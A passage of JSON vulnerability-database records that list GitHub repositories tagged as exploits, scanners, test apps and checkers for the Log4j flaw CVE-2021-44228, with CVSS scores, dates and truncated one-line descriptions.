"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-18T12:50:28", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-18T12:50:40", "id": "C7EE8D86-B287-50F5-B8C2-05E11E510900", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:28:05", "description": "# Searchable Log4j database\n Searchable page for [CISA Log4j (CV...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-01-04T03:37:03", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-08-17T00:21:21", "id": "AF987350-FFD2-5814-AF7B-55862F1A8AFE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T00:36:30", "description": "# log4j-vul\nThis project is just to show Apache Log4j2 Vulnerabi...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-15T05:19:13", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-22T04:39:30", "id": "63500AE8-A10A-5388-B314-001A4CFBDFBD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T01:08:28", "description": "# log4j-shell-poc\nA Proof-Of-Concept for the recently found CVE-...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-09-21T07:43:15", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-09-21T09:04:17", "id": "6E4D24C6-CAF4-5CCB-83A7-844F830C86FC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:34:36", "description": "### Usage...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-11T09:52:36", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-06-20T16:41:33", "id": "94966928-86D4-5285-9A57-CBDD8F2EF438", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:34:14", "description": "# f5-waf-enforce-sigs-CVE-2021-44228\nThis enforces signatures fo...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-11T21:59:19", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-02-11T20:16:18", "id": "DA01F84A-9B1D-5337-A465-2A9AB088C056", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:34:24", "description": "# Log4j 2 CVE-2021-44228 \u6d4b\u8bd5\u6837\u672c\u5e94\u7528\n\n\u57fa\u4e8e spring-boot-starter-log4j2:2...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-11T15:18:42", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-10-23T06:12:54", "id": "9FE4ADCA-7F2C-505F-AE74-C635FF2CDF75", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:33:57", "description": "# docker-log4shell\n\nSimple Go app / Docker image for playing wit...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-12T13:19:50", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-12T13:23:50", "id": "0E43C674-363B-53C2-8686-6F412A995AF4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:34:06", "description": "# CVE-2021-44228 in Minecraft\n- Java 16\n- Paper server build #39...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-12T11:22:51", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-15T06:41:00", "id": "94E003E0-82AE-5CFE-8818-DBA1610BDE3B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:34:43", "description": "# CVE-2021-44228-log4Shell exploit\n\n## Exploit Test\n\n- runs ping...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-12T12:27:39", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-09-07T20:25:29", "id": "06D271D5-7A61-5692-9778-7F521D52F980", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:33:48", "description": "# CVE-2021-44228-docker-example\n\nA simple demonstration of CVE-2...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-12T10:53:15", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T03:58:51", "id": "6F20D8B7-C252-5759-B02B-F8E2C9D42E38", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:33:28", "description": "# Log4j-check\n\u652f\u6301RC1\u7ed5\u8fc7\nlog4J burp\u88ab\u626b\u63d2\u4ef6\u3001CVE-2021-44228\u3001\u652f\u6301RC1\u7ed5\u8fc7\u3001\u652f\u6301js...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-13T01:55:51", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-27T02:45:27", "id": "5E633D2D-95D0-5498-840F-EA92BF2C5A00", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:32:57", "description": "# CVE-2021-44228\nMass recognition tool for CVE-2021-44228\n\n## ne...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-13T13:25:19", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T13:37:39", "id": "D2602292-4969-564A-915E-2EFC6661FA35", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:33:05", "description": "# log4jScan\nsimple python scanner to check if your network is vu...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-13T10:59:50", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-08-27T15:27:38", "id": "2E7FF2D4-97E7-54F5-A5C8-EACD22FCF303", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:32:31", "description": "# CVE-2021-44228-Demo\n\nThis project for prove and testing zero-d...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-14T04:09:02", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-15T07:13:10", "id": "6A34D9C3-C290-5763-BAF4-F1D6351C4BA2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:32:06", "description": "# Log4Shell Exploit Test\n\nThe goal of this project is to demonst...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-13T20:54:10", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T08:30:57", "id": "0E8471F7-D213-552B-ABD8-B3B1FAD4B910", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:32:16", "description": "# Log4j-Checker\nThis repository contains scripts that can help i...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-13T21:11:18", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-21T15:16:18", "id": "5ABB537C-AD08-57E9-9A29-E747D7C29DE9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:31:59", "description": "# Log4j Updater\n\nWith the inevitable need to update the famous J...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-15T04:08:15", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T17:25:55", "id": "4288177C-C609-5D55-A845-D6785929AB4D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:31:27", "description": "Log4Shell Hotfix Side Effect Test Case\n=========================...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-15T13:14:34", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-02-28T20:50:34", "id": "016A0841-D1FF-5056-B062-0D08FCE624CB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:31:24", "description": "# CVE-2021-44228-POC\nYet another CVE-2021-44228 POC\n\nAffected Lo...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-15T17:42:13", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T19:25:27", "id": "DBBD6963-3870-5117-A829-3DE976AE90E2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-28T02:30:48", "description": "# CVE-2021-44228(Apache Log4j Remote Code Execution\uff09\nVersions Af...", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-12-16T14:31:14", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 